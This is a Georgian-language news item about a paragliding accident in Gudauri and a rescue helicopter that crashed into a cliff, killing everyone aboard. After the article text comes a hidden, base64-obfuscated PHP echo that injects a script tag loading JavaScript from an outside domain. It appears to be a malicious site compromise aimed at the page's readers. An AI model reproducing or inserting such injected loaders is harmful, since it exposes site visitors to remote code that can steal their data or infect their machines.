celsiusi
ავერსი შნაიდერი
პარაპლანისტი, რომელიც დღეს გუდაურში ტურისტთან ერთად ფრენის დროს ჩამოვარდა, თბილისის ერთ-ერთ კლინიკაშია გადმოყვანილი. 
 
როგორც ჩვენთვის ხდება ცნობილი, მისი მდგომარეობა სტაბილურია და მის სიცოცხლეს საფრთხე არ ემუქრება.
 
გუშინ, 29 ივლისს, გუდაურში პარაპლანი კლდეს დაეჯახა. პარაპლანის ჩამოვარდნისას დაშავებულების დასახმარებლად მიდიოდ სასაზღვრო პოლიციის ვერტმფრენი გაგზავნეს, რომელშიც ოფიციალური უწყებების ცნობით,"ბორტზე 8 ადამიანი იმყოფებოდა",  ეკიპაჟის 4 წევრი, ასევე, შინაგან საქმეთა სამინისტროს საგანგებო სიტუაციების მართვის სამსახურის 2 მაშველი და ჯანდაცვის სამინისტროს საგანგებო სიტუაციების კოორდინაციისა და გადაუდებელი დახმარების ცენტრის 2 მედიკოსი. სამაშველო ვერტმფრენი კლდეს დაეჯახა და აფეთქდა. 
 
შინაგან საქმეთა მინისტრის, ვახტანგ გომელაურის თქმით, ვერტმფრენში მყოფი ყველა პირი დაიღუპა. რაც შეეხება პარაპლანის პილოტსა და ტურისტს, გარდაიცვალა  უცხოელი ტურისტი, პილოტი ამოიყვანეს და დაშავებულია. 
 
 
749
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");